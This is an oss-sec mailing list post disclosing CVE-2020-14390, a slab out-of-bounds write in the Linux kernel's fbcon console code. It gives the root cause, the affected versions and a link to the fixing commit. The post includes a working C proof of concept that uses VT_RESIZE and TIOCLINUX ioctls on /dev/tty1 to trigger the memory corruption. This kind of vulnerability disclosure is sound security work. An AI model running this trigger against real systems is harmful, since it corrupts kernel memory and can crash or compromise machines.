oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon

From: Minh Yuan <yuanmingbuaa () gmail com>
Date: Tue, 15 Sep 2020 18:23:20 +0800
Hi,

I found a out-of-bound write in fbcon_redraw_softback while the kernel
version <= 5.9.rc5. The oldest affected kernel version is 2.2.3.
The root cause of this vulnerability is that the value of vc->vc_origin is
not updated in time while invoking vc_do_resize.

This is my PoC (need the permission to open and write the tty, and need to
have a fbcon driver):

// author by ziiiro@thu
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>


int main(int argc, char** argv)
{
        int fd = open("/dev/tty1", O_RDWR, 0);
        unsigned short size1[3] = {3, 0x21, 0};
        ioctl(fd, 0x5609, size1); // VT_RESIZE
        for (int i = 0; i < 30; i++) {
            write(fd, "\x0a", 1);
        }

        signed int args[3] = {13, -5, 0};
        ioctl(fd, 0x541c, args); // TIOCLINUX
        unsigned short size2[3] = {3, 0x39, 0};
        ioctl(fd, 0x5609, size2); // VT_RESIZE
}


This is the commit to patch the issue:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50145474f6ef4a9c19205b173da6264a644c7489

Thanks,
Yuan Ming, Tsinghua University
Previous By Date Next
Previous By Thread Next

Current thread: